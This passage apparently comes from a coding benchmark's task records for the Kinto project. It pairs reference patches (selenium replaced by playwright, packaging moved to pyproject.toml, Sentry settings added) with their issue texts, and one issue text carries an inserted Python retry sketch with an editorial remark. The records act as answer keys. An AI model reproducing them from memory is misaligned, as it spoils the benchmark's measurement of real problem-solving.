$(VENV)/bin/py.test tests/browser.py
clean:
diff --git a/constraints.in b/constraints.in
index b706aa9ec..1a2c98377 100644
--- a/constraints.in
+++ b/constraints.in
@@ -33,7 +33,7 @@ bravado_core
pytest
pytest-cache
pytest-cov
-selenium
+playwright
webtest
# dev
build
diff --git a/constraints.txt b/constraints.txt
index 0ad1011a8..f24719053 100644
--- a/constraints.txt
+++ b/constraints.txt
@@ -1,17 +1,15 @@
#
-# This file is autogenerated by pip-compile with Python 3.9
+# This file is autogenerated by pip-compile with Python 3.10
# by the following command:
#
-# pip-compile --strip-extras
+# pip-compile --output-file=constraints.txt --strip-extras constraints.in
#
arrow==1.3.0
# via isoduration
attrs==23.2.0
# via
# jsonschema
- # outcome
# referencing
- # trio
bcrypt==4.1.2
# via -r constraints.in
beautifulsoup4==4.12.3
@@ -23,7 +21,6 @@ build==1.0.3
certifi==2023.11.17
# via
# requests
- # selenium
# sentry-sdk
charset-normalizer==3.3.2
# via requests
@@ -46,27 +43,21 @@ coverage==7.4.0
dockerflow==2024.1.0
# via -r constraints.in
exceptiongroup==1.2.0
- # via
- # pytest
- # trio
- # trio-websocket
+ # via pytest
execnet==2.0.2
# via pytest-cache
fqdn==1.5.1
# via jsonschema
greenlet==3.0.3
- # via sqlalchemy
-h11==0.14.0
- # via wsproto
+ # via
+ # playwright
+ # sqlalchemy
hupper==1.12
# via pyramid
idna==3.6
# via
# jsonschema
# requests
- # trio
-importlib-metadata==7.0.1
- # via build
iniconfig==2.0.0
# via pytest
iso8601==2.1.0
@@ -96,8 +87,6 @@ msgpack==1.0.7
# via bravado-core
newrelic==9.6.0
# via -r constraints.in
-outcome==1.3.0.post0
- # via trio
packaging==23.2
# via
# build
@@ -111,10 +100,14 @@ plaster==1.1.2
# pyramid
plaster-pastedeploy==1.0.1
# via pyramid
+playwright==1.41.1
+ # via -r constraints.in
pluggy==1.3.0
# via pytest
psycopg2==2.9.9
# via -r constraints.in
+pyee==11.0.1
+ # via playwright
pyproject-hooks==1.0.0
# via build
pyramid==2.0.2
@@ -130,8 +123,6 @@ pyramid-multiauth==1.0.1
# via -r constraints.in
pyramid-tm==2.5
# via -r constraints.in
-pysocks==1.7.1
- # via urllib3
pytest==7.4.4
# via
# -r constraints.in
@@ -176,8 +167,6 @@ rpds-py==0.17.1
# referencing
ruff==0.1.15
# via -r constraints.in
-selenium==4.12.0
- # via -r constraints.in
sentry-sdk==1.39.2
# via -r constraints.in
simplejson==3.19.2
@@ -188,10 +177,6 @@ six==1.16.0
# cornice-swagger
# python-dateutil
# rfc3339-validator
-sniffio==1.3.0
- # via trio
-sortedcontainers==2.4.0
- # via trio
soupsieve==2.5
# via beautifulsoup4
sqlalchemy==2.0.25
@@ -220,16 +205,11 @@ translationstring==1.4
# via
# colander
# pyramid
-trio==0.24.0
- # via
- # selenium
- # trio-websocket
-trio-websocket==0.11.1
- # via selenium
types-python-dateutil==2.8.19.20240106
# via arrow
typing-extensions==4.9.0
# via
+ # pyee
# sqlalchemy
# swagger-spec-validator
uri-template==1.3.0
@@ -237,7 +217,6 @@ uri-template==1.3.0
urllib3==2.1.0
# via
# requests
- # selenium
# sentry-sdk
venusian==3.1.0
# via
@@ -257,10 +236,6 @@ webtest==3.0.0
# via -r constraints.in
werkzeug==3.0.1
# via -r constraints.in
-wsproto==1.2.0
- # via trio-websocket
-zipp==3.17.0
- # via importlib-metadata
zope-deprecation==5.0
# via pyramid
zope-interface==6.1
diff --git a/docs/community.rst b/docs/community.rst
index 1abc7afc3..3751913c3 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -235,16 +235,7 @@ In another terminal, run the end-to-end tests with:
Browser Tests
-------------
-
-Make sure the `geckodriver <https://github.com/mozilla/geckodriver/releases>`_ binary is available in your path.
-
-.. note::
-
- If your installation of *Firefox* is custom, specify the path of its binary using an alias:
-
- ::
-
- alias geckodriver="geckodriver --binary /path/to/firefox"
+We use `playwright <https://playwright.dev/>`_ for browser testing. The tests included in this repo are very simple and verify the admin UI can at least authenticate with the current kinto back-end. Comprehensive unit tests are maintained in the kinto-admin repo.
In a terminal, run an instance with the provided ``browser.ini`` configuration:
diff --git a/pyproject.toml b/pyproject.toml
index b21d218c3..3385307c1 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -87,7 +87,7 @@ test = [
"pytest",
"pytest-cache",
"pytest-cov",
- "selenium",
+ "playwright",
"webtest",
]
dev = [
| Investigate selenium test errors
We've had some recent inconsistent test runs with browser-tests where selenium will fail due to stale DOM elements. Initial investigations couldn't find a good solution, so we now have a time.sleep(1) line in the browser tests. Locate and fix the root cause.
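A common root-cause fix for stale-element flakiness is to replace blind sleeps with an explicit poll-until-condition loop. This is an illustrative pure-Python sketch — the names `wait_until` and `StaleElementError` are hypothetical and not from the Kinto test suite (Playwright's auto-waiting locators solve the same problem, which is what the PR ultimately adopts):

```python
import time

class StaleElementError(Exception):
    """Stand-in for the stale-element errors a browser driver can raise."""

def wait_until(condition, timeout=5.0, interval=0.1):
    # Re-evaluate `condition` until it returns a truthy value, swallowing
    # transient staleness errors instead of sleeping for a fixed duration.
    deadline = time.monotonic() + timeout
    last_exc = None
    while time.monotonic() < deadline:
        try:
            result = condition()
            if result:
                return result
        except StaleElementError as exc:
            last_exc = exc
        time.sleep(interval)
    raise TimeoutError(f"condition not met within {timeout}s") from last_exc

# Example: a condition that only becomes truthy on the third attempt.
attempts = {"n": 0}
def flaky():
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise StaleElementError()
    return "ready"

print(wait_until(flaky))  # -> ready
```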
| We also now have errors on Selenium > 4.12 | 2024-02-02T16:07:35 | 0.0 | [] | [] |
||
Kinto/kinto | Kinto__kinto-3359 | 3bea2d67dda5f820c6a5857dac192590032624d0 | diff --git a/Dockerfile b/Dockerfile
index 418f08f63..6c69d5dd8 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -25,7 +25,9 @@ COPY --from=python-builder /opt/venv /opt/venv
COPY . /app
COPY --from=node-builder /kinto/plugins/admin/build ./kinto/plugins/admin/build
-ENV KINTO_INI=/etc/kinto/kinto.ini \
+ARG KINTO_VERSION=1
+ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_KINTO=${KINTO_VERSION} \
+ KINTO_INI=/etc/kinto/kinto.ini \
PORT=8888 \
PATH="/opt/venv/bin:$PATH"
diff --git a/MANIFEST.in b/MANIFEST.in
deleted file mode 100644
index 8aa0b5b0f..000000000
--- a/MANIFEST.in
+++ /dev/null
@@ -1,6 +0,0 @@
-include *.rst LICENSE Makefile app.wsgi requirements.txt dev-requirements.txt
-include kinto/config/kinto.tpl
-recursive-include kinto *.sql *.html
-recursive-include docs *.rst *.png *.svg *.css *.html conf.py piwik.js
-include kinto/plugins/admin/VERSION
-recursive-include kinto/plugins/admin/build *
diff --git a/Makefile b/Makefile
index 66fca0c21..e94b5c7e1 100644
--- a/Makefile
+++ b/Makefile
@@ -37,7 +37,7 @@ help:
all: install
install: $(INSTALL_STAMP)
-$(INSTALL_STAMP): $(PYTHON) setup.py requirements.txt setup.cfg
+$(INSTALL_STAMP): $(PYTHON) requirements.txt pyproject.toml
$(VENV)/bin/pip install -U pip
$(VENV)/bin/pip install -Ue . -c requirements.txt
touch $(INSTALL_STAMP)
@@ -55,8 +55,8 @@ install-memcached: $(INSTALL_STAMP) $(DEV_STAMP)
$(VENV)/bin/pip install -Ue ".[memcached]" -c requirements.txt
install-dev: $(INSTALL_STAMP) $(DEV_STAMP)
-$(DEV_STAMP): $(PYTHON) dev-requirements.txt
- $(VENV)/bin/pip install -Ur dev-requirements.txt
+$(DEV_STAMP): $(PYTHON) requirements.txt
+ $(VENV)/bin/pip install -Ue ".[dev,test]" -c requirements.txt
touch $(DEV_STAMP)
install-docs: $(DOC_STAMP)
@@ -64,6 +64,9 @@ $(DOC_STAMP): $(PYTHON) docs/requirements.txt
$(VENV)/bin/pip install -Ur docs/requirements.txt
touch $(DOC_STAMP)
+requirements.txt: requirements.in
+ pip-compile
+
build-kinto-admin: need-npm
scripts/build-kinto-admin.sh
@@ -86,7 +89,7 @@ migrate: install $(SERVER_CONFIG)
test: tests
tests-once: tests
tests: install-postgres install-monitoring install-memcached version-file install-dev
- $(VENV)/bin/py.test --cov-config setup.cfg --cov-report term-missing --cov-fail-under 100 --cov kinto
+ $(VENV)/bin/py.test --cov-config pyproject.toml --cov-report term-missing --cov-fail-under 100 --cov kinto
tests-raw: version-file install-dev
$(VENV)/bin/py.test
@@ -134,9 +137,10 @@ docs: install-docs
@echo
@echo "Build finished. The HTML pages are in $(SPHINX_BUILDDIR)/html/index.html"
+.PHONY: build
build:
- docker build --pull -t kinto/kinto-server:latest .
+ docker build --build-arg="KINTO_VERSION=$(shell git describe --abbrev=0)" --pull -t kinto/kinto-server:latest .
test-description: install-dev
- $(VENV)/bin/python setup.py bdist_wheel
+ $(VENV)/bin/python -m build
$(VENV)/bin/twine check dist/*.whl
diff --git a/dev-requirements.txt b/dev-requirements.txt
deleted file mode 100644
index cb8b3a6c0..000000000
--- a/dev-requirements.txt
+++ /dev/null
@@ -1,13 +0,0 @@
-bravado==11.0.3
-bravado_core==6.1.1
-pytest==7.4.4
-pytest-cache==1.0
-pytest-cov==4.1.0
-pytest-watch==4.2.0
-python-memcached==1.62
-ruff==0.1.14
-selenium==4.12.0
-swagger-spec-validator==3.0.3
-WebTest==3.0.0
-wheel==0.42.0
-zest.releaser==9.1.1
diff --git a/docs/community.rst b/docs/community.rst
index 103f65c2d..1abc7afc3 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -274,72 +274,32 @@ There are three levels of cleaning your environment:
How to release
==============
-In order to prepare a new release, we are following the following steps.
-
-The ``prerelease`` and ``postrelease`` commands are coming from `zest.releaser
-<https://pypi.python.org/pypi/zest.releaser>`_, which should already be
-installed along with other development requirements.
+In order to prepare a new release, follow these steps:
Step 1
------
- Merge remaining pull requests
-- Update ``CHANGELOG.rst``
-- Update supported version in ``SECURITY.md``
+- Make sure supported version is up-to-date in :file:`SECURITY.md`
- If API was updated, update API changelog in :file:`docs/api/index.rst`
- Make sure ``HTTP_API_VERSION`` is up-to-date in :file:`kinto/__init__.py`
-- Update the link in :file:`docs/configuration/production.rst`
-- Update the **kinto-admin** version in :file:`kinto/plugins/admin/VERSION` if needed
- (`available releases <https://github.com/Kinto/kinto-admin/releases>`_)
-
-- Update :file:`CONTRIBUTORS.rst`. The following hairy command will output the full list:
+- Make sure the list of contributors is up-to-date in :file:`CONTRIBUTORS.rst`. The following hairy command will output the full list:
.. code-block:: bash
$ git shortlog -sne | awk '{$1=""; sub(" ", ""); print}' | awk -F'<' '!x[$1]++' | awk -F'<' '!x[$2]++' | sort
-- Leverage zest.releaser to update setup file and changelog:
-
-.. code-block:: bash
-
- $ git checkout -b prepare-X.Y.Z
- $ make test-description
- $ prerelease
-
-- Open a pull-request to release the new version.
-
-.. code-block:: bash
-
- $ git commit -a --amend
- $ git push origin prepare-X.Y.Z
-
-
Step 2
------
-Once the pull-request is approved, merge it and initiate a release.
-
-.. code-block:: bash
-
- $ git checkout main
- $ git tag -a X.Y.Z -m "X.Y.Z"
- $ git push origin X.Y.Z
-
-With this tag push, a Github Action will take care of publishing the package on Pypi.
+1. Create a release on Github on https://github.com/Kinto/kinto-attachment/releases/new
+2. Create a new tag `X.Y.Z` (*This tag will be created from the target when you publish this release.*)
+3. Generate release notes
+4. Publish release
Step 3
------
-As a final step:
-
-- Add entry in GitHub releases page
-- Check that the version in ReadTheDocs is up-to-date
-- Check that a Pypi package was built
+- Check that the version in ReadTheDocs was published
+- Check that a Pypi package was published
- Tweet about it!
-
-You can now use the ``postrelease`` command to add a new empty section in the changelog and bump the next version with a ``.dev0`` suffix.
-
-
-.. note::
-
- Dependabot will take care of upgrading the ``kinto`` package via pull-requests on the various repositories of the Kinto ecosystem.
diff --git a/docs/configuration/production.rst b/docs/configuration/production.rst
index 80e90b820..e26ab4c67 100644
--- a/docs/configuration/production.rst
+++ b/docs/configuration/production.rst
@@ -181,7 +181,7 @@ adjustments:
.. note::
For an exhaustive list of available settings and their default values,
- refer to the *Kinto* `source code <https://github.com/Kinto/kinto/blob/13.6.2/kinto/core/__init__.py#L34-L103>`_.
+ refer to the *Kinto* `source code <https://github.com/Kinto/kinto/blob/main/kinto/core/__init__.py>`_.
By default, nobody can read buckets list. You can change that using:
diff --git a/pyproject.toml b/pyproject.toml
index b5403472b..dc75b4cc5 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,3 +1,107 @@
+[project]
+dynamic = ["version", "readme"]
+name = "kinto"
+description = "Kinto Web Service - Store, Sync, Share, and Self-Host."
+license = {file = "LICENSE"}
+classifiers = [
+ "Programming Language :: Python",
+ "Programming Language :: Python :: 3",
+ "Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: Implementation :: CPython",
+ "Topic :: Internet :: WWW/HTTP",
+ "Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
+ "License :: OSI Approved :: Apache Software License",
+]
+keywords = ["web", "sync", "json", "storage", "services"]
+authors = [
+ {name = "Mozilla Services", email = "[email protected]"},
+]
+dependencies = [
+ "bcrypt",
+ "colander",
+ "cornice",
+ "cornice_swagger",
+ "dockerflow",
+ "jsonschema",
+ "jsonpatch",
+ "logging-color-formatter",
+ "python-dateutil",
+ "pyramid",
+ "pyramid_mailer",
+ "pyramid_multiauth",
+ "transaction",
+ "pyramid_tm",
+ "requests",
+ "waitress",
+ "python-rapidjson",
+]
+
+[project.urls]
+Repository = "https://github.com/Kinto/kinto"
+
+[project.scripts]
+kinto = "kinto.__main__:main"
+
+[project.entry-points."paste.app_factory"]
+main = "kinto:main"
+
+[tool.setuptools.packages.find]
+include = ["kinto"]
+
+[tool.setuptools.dynamic]
+readme = {file = ["README.rst", "CONTRIBUTORS.rst"]}
+
+[tool.setuptools_scm]
+# can be empty if no extra settings are needed, presence enables setuptools_scm
+
+[build-system]
+requires = ["setuptools>=64", "setuptools_scm>=8"]
+build-backend = "setuptools.build_meta"
+
+[project.optional-dependencies]
+redis = [
+ "kinto_redis",
+]
+memcached = [
+ "python-memcached",
+]
+postgresql = [
+ "SQLAlchemy < 3",
+ "psycopg2",
+ "zope.sqlalchemy",
+]
+monitoring = [
+ "newrelic",
+ "sentry-sdk[sqlalchemy]",
+ "statsd",
+ "werkzeug",
+]
+test = [
+ "bravado",
+ "pytest",
+ "pytest-cache",
+ "pytest-cov",
+ "selenium",
+ "webtest",
+]
+dev = [
+ "build",
+ "ruff",
+ "twine",
+]
+
+[tool.pip-tools]
+# Pip does not support installing in editable mode with hashes.
+generate-hashes = false
+# Pip does not support extras in constraints.
+strip-extras = true
+
+[tool.coverage.run]
+branch = true
+
[tool.ruff]
line-length = 99
extend-exclude = [
diff --git a/requirements.in b/requirements.in
new file mode 100644
index 000000000..b706aa9ec
--- /dev/null
+++ b/requirements.in
@@ -0,0 +1,40 @@
+# main dependencies
+bcrypt
+colander
+cornice
+cornice_swagger
+dockerflow
+jsonschema
+jsonpatch
+logging-color-formatter
+python-dateutil
+pyramid
+pyramid_mailer
+pyramid_multiauth
+transaction
+pyramid_tm
+requests
+waitress
+python-rapidjson
+# optional dependencies
+# memcached
+python-memcached
+# postgresql
+SQLAlchemy < 3
+psycopg2
+zope.sqlalchemy
+# monitoring
+newrelic
+sentry-sdk[sqlalchemy]
+statsd
+werkzeug
+# test
+bravado_core
+pytest
+pytest-cache
+pytest-cov
+selenium
+webtest
+# dev
+build
+ruff
diff --git a/requirements.txt b/requirements.txt
index c1544988c..57816f14d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,25 +1,275 @@
+#
+# This file is autogenerated by pip-compile with Python 3.9
+# by the following command:
+#
+# pip-compile --strip-extras
+#
+arrow==1.3.0
+ # via isoduration
+attrs==23.2.0
+ # via
+ # jsonschema
+ # outcome
+ # referencing
+ # trio
bcrypt==4.1.2
+ # via -r requirements.in
+beautifulsoup4==4.12.3
+ # via webtest
+bravado-core==6.1.1
+ # via -r requirements.in
+build==1.0.3
+ # via -r requirements.in
+certifi==2023.11.17
+ # via
+ # requests
+ # selenium
+ # sentry-sdk
+charset-normalizer==3.3.2
+ # via requests
colander==2.0
+ # via
+ # -r requirements.in
+ # cornice-swagger
+colorama==0.4.6
+ # via logging-color-formatter
cornice==6.0.1
+ # via
+ # -r requirements.in
+ # cornice-swagger
cornice-swagger==1.0.1
+ # via -r requirements.in
+coverage==7.4.0
+ # via
+ # coverage
+ # pytest-cov
dockerflow==2024.1.0
+ # via -r requirements.in
+exceptiongroup==1.2.0
+ # via
+ # pytest
+ # trio
+ # trio-websocket
+execnet==2.0.2
+ # via pytest-cache
+fqdn==1.5.1
+ # via jsonschema
+h11==0.14.0
+ # via wsproto
+hupper==1.12
+ # via pyramid
+idna==3.6
+ # via
+ # jsonschema
+ # requests
+ # trio
+importlib-metadata==7.0.1
+ # via build
+iniconfig==2.0.0
+ # via pytest
+iso8601==2.1.0
+ # via colander
+isoduration==20.11.0
+ # via jsonschema
jsonpatch==1.33
-jsonschema==4.20.0
-logging-color-formatter==1.0.3
+ # via -r requirements.in
+jsonpointer==2.4
+ # via
+ # jsonpatch
+ # jsonschema
+jsonref==1.1.0
+ # via bravado-core
+jsonschema==4.21.1
+ # via
+ # -r requirements.in
+ # bravado-core
+ # swagger-spec-validator
+jsonschema-specifications==2023.12.1
+ # via jsonschema
+logging-color-formatter==1.1.0
+ # via -r requirements.in
+markupsafe==2.1.4
+ # via werkzeug
+msgpack==1.0.7
+ # via bravado-core
newrelic==9.5.0
+ # via -r requirements.in
+outcome==1.3.0.post0
+ # via trio
+packaging==23.2
+ # via
+ # build
+ # pytest
+ # zope-sqlalchemy
+pastedeploy==3.1.0
+ # via plaster-pastedeploy
+plaster==1.1.2
+ # via
+ # plaster-pastedeploy
+ # pyramid
+plaster-pastedeploy==1.0.1
+ # via pyramid
+pluggy==1.3.0
+ # via pytest
psycopg2==2.9.9
+ # via -r requirements.in
+pyproject-hooks==1.0.0
+ # via build
pyramid==2.0.2
+ # via
+ # -r requirements.in
+ # cornice
+ # pyramid-mailer
+ # pyramid-multiauth
+ # pyramid-tm
pyramid-mailer==0.15.1
+ # via -r requirements.in
pyramid-multiauth==1.0.1
+ # via -r requirements.in
pyramid-tm==2.5
+ # via -r requirements.in
+pysocks==1.7.1
+ # via urllib3
+pytest==7.4.4
+ # via
+ # -r requirements.in
+ # pytest-cache
+ # pytest-cov
+pytest-cache==1.0
+ # via -r requirements.in
+pytest-cov==4.1.0
+ # via -r requirements.in
python-dateutil==2.8.2
+ # via
+ # -r requirements.in
+ # arrow
+ # bravado-core
python-memcached==1.62
-sentry-sdk==1.39.2
+ # via -r requirements.in
+python-rapidjson==1.14
+ # via -r requirements.in
+pytz==2023.3.post1
+ # via bravado-core
+pyyaml==6.0.1
+ # via
+ # bravado-core
+ # swagger-spec-validator
+referencing==0.32.1
+ # via
+ # jsonschema
+ # jsonschema-specifications
+repoze-sendmail==4.4.1
+ # via pyramid-mailer
requests==2.31.0
-SQLAlchemy==2.0.25
+ # via
+ # -r requirements.in
+ # bravado-core
+rfc3339-validator==0.1.4
+ # via jsonschema
+rfc3986-validator==0.1.1
+ # via jsonschema
+rpds-py==0.17.1
+ # via
+ # jsonschema
+ # referencing
+ruff==0.1.14
+ # via -r requirements.in
+selenium==4.12.0
+ # via -r requirements.in
+sentry-sdk==1.39.2
+ # via -r requirements.in
+simplejson==3.19.2
+ # via bravado-core
+six==1.16.0
+ # via
+ # bravado-core
+ # cornice-swagger
+ # python-dateutil
+ # rfc3339-validator
+sniffio==1.3.0
+ # via trio
+sortedcontainers==2.4.0
+ # via trio
+soupsieve==2.5
+ # via beautifulsoup4
+sqlalchemy==2.0.25
+ # via
+ # -r requirements.in
+ # sentry-sdk
+ # zope-sqlalchemy
statsd==4.0.1
+ # via -r requirements.in
+swagger-spec-validator==3.0.3
+ # via bravado-core
+tomli==2.0.1
+ # via
+ # build
+ # coverage
+ # pyproject-hooks
+ # pytest
transaction==4.0
-python-rapidjson==1.14
+ # via
+ # -r requirements.in
+ # pyramid-mailer
+ # pyramid-tm
+ # repoze-sendmail
+ # zope-sqlalchemy
+translationstring==1.4
+ # via
+ # colander
+ # pyramid
+trio==0.24.0
+ # via
+ # selenium
+ # trio-websocket
+trio-websocket==0.11.1
+ # via selenium
+types-python-dateutil==2.8.19.20240106
+ # via arrow
+typing-extensions==4.9.0
+ # via
+ # selenium
+ # sqlalchemy
+ # swagger-spec-validator
+uri-template==1.3.0
+ # via jsonschema
+urllib3==2.1.0
+ # via
+ # requests
+ # selenium
+ # sentry-sdk
+venusian==3.1.0
+ # via
+ # cornice
+ # pyramid
waitress==2.1.2
-Werkzeug==3.0.1
-zope.sqlalchemy==3.1
+ # via
+ # -r requirements.in
+ # webtest
+webcolors==1.13
+ # via jsonschema
+webob==1.8.7
+ # via
+ # pyramid
+ # webtest
+webtest==3.0.0
+ # via -r requirements.in
+werkzeug==3.0.1
+ # via -r requirements.in
+wsproto==1.2.0
+ # via trio-websocket
+zipp==3.17.0
+ # via importlib-metadata
+zope-deprecation==5.0
+ # via pyramid
+zope-interface==6.1
+ # via
+ # pyramid
+ # repoze-sendmail
+ # transaction
+ # zope-sqlalchemy
+zope-sqlalchemy==3.1
+ # via -r requirements.in
+
+# The following packages are considered to be unsafe in a requirements file:
+# setuptools
diff --git a/setup.cfg b/setup.cfg
deleted file mode 100644
index 5b30cfbc4..000000000
--- a/setup.cfg
+++ /dev/null
@@ -1,89 +0,0 @@
-[metadata]
-name = kinto
-version = 16.3.0
-description = Kinto Web Service - Store, Sync, Share, and Self-Host.
-long_description = file: README.rst, CHANGELOG.rst, CONTRIBUTORS.rst
-long_description_content_type = text/x-rst
-license = Apache License (2.0)
-author = Mozilla Services
-author_email = [email protected]
-url = https://github.com/Kinto/kinto
-download_url = https://github.com/Kinto/kinto/tarball/main
-keywords = web sync json storage services
-classifiers =
- Programming Language :: Python
- Programming Language :: Python :: 3
- Programming Language :: Python :: 3.8
- Programming Language :: Python :: 3.9
- Programming Language :: Python :: 3.10
- Programming Language :: Python :: 3.11
- Programming Language :: Python :: Implementation :: CPython
- Topic :: Internet :: WWW/HTTP
- Topic :: Internet :: WWW/HTTP :: WSGI :: Application
- License :: OSI Approved :: Apache Software License
-
-[options]
-packages = find:
-include_package_data = True
-zip_safe = False
-install_requires =
- bcrypt
- colander
- cornice
- cornice_swagger
- dockerflow
- jsonschema
- jsonpatch
- logging-color-formatter
- python-dateutil
- pyramid
- pyramid_mailer
- pyramid_multiauth
- transaction
- pyramid_tm
- requests
- waitress
- python-rapidjson
-tests_require =
- bravado_core
- pytest
- pytest-runner
- WebTest
-test_suite = tests
-
-[options.packages.find]
-exclude =
- docs
- tests
- tests.*
-
-[options.package_data]
-* = *.rst, *.py, *.yaml
-
-[options.entry_points]
-paste.app_factory =
- main = kinto:main
-console_scripts =
- kinto = kinto.__main__:main
-
-[options.extras_require]
-memcached =
- python-memcached
-postgresql =
- SQLAlchemy < 3
- psycopg2
- zope.sqlalchemy
-monitoring =
- newrelic
- sentry-sdk[sqlalchemy]
- statsd
- werkzeug
-
-[aliases]
-test=pytest
-
-[bdist_wheel]
-python_tag=cp3
-
-[coverage:run]
-branch = True
diff --git a/setup.py b/setup.py
deleted file mode 100644
index b908cbe55..000000000
--- a/setup.py
+++ /dev/null
@@ -1,3 +0,0 @@
-import setuptools
-
-setuptools.setup()
| Get rid of tox
The tox.ini duplicates a lot of dependency lists, test commands, etc.
With this PR, we test the different environments in CI, and if developers want to run the project locally with a specific version of Python, then it's their responsibility (the `Makefile` supports creating a venv in advance anyway)
Run functional tests on freshly built container
This will make sure we don't break the `docker build` and that published images always get consistently tested.
Decouple `kinto-redis` from this repository
In order to make sure we don't offer features that are unstable or outdated, I would prefer to decouple kinto-redis from this project, because it is not actively maintained (last commit 3 years ago).
Our team at Mozilla is the only group of folks who still actively maintains kinto. And since kinto-redis is not used in our production service anymore, it is not in the bag of things we maintain.
It does not mean it is not supported; it is probably stable and will run as expected. If you want to use it, you have to set it up yourself, since `kinto init` won't propose the option anymore. That's why I mark this PR as a breaking change.
| 2024-01-24T07:44:41 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3055 | e7dd22e221f220754383bfa44010d0ccfbfbd58e | diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 97d76656b..226114202 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,6 +6,40 @@ This document describes changes between each past release.
14.8.1 (unreleased)
-------------------
+**Breaking Changes**
+
+- ``raven`` is not installed by default anymore (fixes #3054). Sentry reporting is now enabled via settings (or environment variables).
+
+In order to migrate from Kinto <14 to Kinto 15, remove the mention of ``sentry`` and ``raven`` from your logging configuration:
+
+.. code-block:: diff
+
+ # kinto.ini
+
+ [logger_root]
+ level = INFO
+ - handlers = console, sentry
+ + handlers = console
+
+ [handlers]
+ - keys = console, sentry
+ + keys = console
+
+ - [handler_sentry]
+ - class = raven.handlers.logging.SentryHandler
+ - args = ('https://<key>:<secret>@app.getsentry.com/<project>',)
+ - level = WARNING
+ - formatter = generic
+
+And add the following settings:
+
+.. code-block:: ini
+
+ kinto.sentry_dsn = https://[email protected]/1
+ kinto.sentry_env = prod
+
+For more information, see `Settings documentation <https://kinto.readthedocs.io/en/stable/configuration/settings.html#authentication>`_.
+
**Documentation**
- Fix ``/batch`` endpoint documentation about required authentication.
diff --git a/docs/configuration/production.rst b/docs/configuration/production.rst
index 8f8f72e32..87f0ac053 100644
--- a/docs/configuration/production.rst
+++ b/docs/configuration/production.rst
@@ -271,7 +271,6 @@ processed through `Kibana <https://github.com/elastic/kibana>`_ or
With the following configuration, all logs are structured in JSON and
redirected to standard output (See `12factor app <http://12factor.net/logs>`_).
-A `Sentry <https://getsentry.com>`_ logger is also enabled.
.. note::
@@ -283,14 +282,14 @@ A `Sentry <https://getsentry.com>`_ logger is also enabled.
keys = root
[handlers]
- keys = console, sentry
+ keys = console
[formatters]
keys = generic, json
[logger_root]
level = INFO
- handlers = console, sentry
+ handlers = console
[handler_console]
class = StreamHandler
@@ -298,12 +297,6 @@ A `Sentry <https://getsentry.com>`_ logger is also enabled.
level = NOTSET
formatter = json
- [handler_sentry]
- class = raven.handlers.logging.SentryHandler
- args = ('https://<key>:<secret>@app.getsentry.com/<project>',)
- level = WARNING
- formatter = generic
-
[formatter_json]
class = kinto.core.JsonLogFormatter
diff --git a/docs/configuration/settings.rst b/docs/configuration/settings.rst
index 61ac90921..b80ff07ae 100644
--- a/docs/configuration/settings.rst
+++ b/docs/configuration/settings.rst
@@ -396,17 +396,29 @@ Example output:
{"Pid": 19240, "Type": "root", "Timestamp": 1489067817834153984, "Severity": 4, "Hostname": "pluo", "Logger": "%", "EnvVersion": "2.0", "Fields": {"perm": "read", "userid": "ldap:[email protected]", "message": "Permission not granted.", "uri": "/buckets/123"}}
+.. _handling-exceptions-with-sentry:
+
Handling exceptions with Sentry
:::::::::::::::::::::::::::::::
-Requires the ``raven`` package.
-Sentry logging can be enabled `as explained in official documentation
-<https://raven.readthedocs.io/en/latest/integrations/pyramid.html#logger-setup>`_.
+Sentry reporting can be enabled via the following settings:
+
+.. code-block:: ini
+
+ kinto.sentry_dsn = https://[email protected]/1
+ kinto.sentry_env = stage
+
+Or the equivalent environment variables:
+
+::
+
+ SENTRY_DSN=https://[email protected]/1
+ SENTRY_ENV=stage
.. note::
- The application sends an *INFO* message on startup (mainly for setup check).
+ The application sends an event on startup (mainly for setup check).
Monitoring with StatsD
diff --git a/kinto/config/kinto.tpl b/kinto/config/kinto.tpl
index 893c43620..c333024de 100644
--- a/kinto/config/kinto.tpl
+++ b/kinto/config/kinto.tpl
@@ -239,6 +239,9 @@ kinto.bucket_create_principals = account:admin
# kinto.statsd_prefix = kinto
# kinto.statsd_url =
+# kinto.sentry_dsn =
+# kinto.sentry_env =
+
# kinto.newrelic_config =
# kinto.newrelic_env = dev
diff --git a/kinto/core/__init__.py b/kinto/core/__init__.py
index 6824dc8a4..173e55004 100644
--- a/kinto/core/__init__.py
+++ b/kinto/core/__init__.py
@@ -63,6 +63,7 @@
"kinto.core.initialization.setup_deprecation",
"kinto.core.initialization.setup_authentication",
"kinto.core.initialization.setup_backoff",
+ "kinto.core.initialization.setup_sentry",
"kinto.core.initialization.setup_statsd",
"kinto.core.initialization.setup_listeners",
"kinto.core.events.setup_transaction_hook",
@@ -86,6 +87,8 @@
"retry_after_seconds": 30,
"version_prefix_redirect_ttl_seconds": -1,
"settings_prefix": "",
+ "sentry_dsn": None,
+ "sentry_env": None,
"statsd_backend": "kinto.core.statsd",
"statsd_prefix": "kinto.core",
"statsd_url": None,
diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 4d8a92517..05c0329b4 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -5,7 +5,7 @@
from datetime import datetime
from dateutil import parser as dateparser
-from pyramid.events import NewRequest, NewResponse
+from pyramid.events import ApplicationCreated, NewRequest, NewResponse
from pyramid.exceptions import ConfigurationError
from pyramid.httpexceptions import HTTPBadRequest, HTTPGone, HTTPTemporaryRedirect
from pyramid.interfaces import IAuthenticationPolicy
@@ -26,6 +26,11 @@
from werkzeug.middleware.profiler import ProfilerMiddleware
except ImportError: # pragma: no cover
ProfilerMiddleware = False
+try:
+ import sentry_sdk
+ from sentry_sdk.integrations.pyramid import PyramidIntegration
+except ImportError: # pragma: no cover
+ sentry_sdk = None
logger = logging.getLogger(__name__)
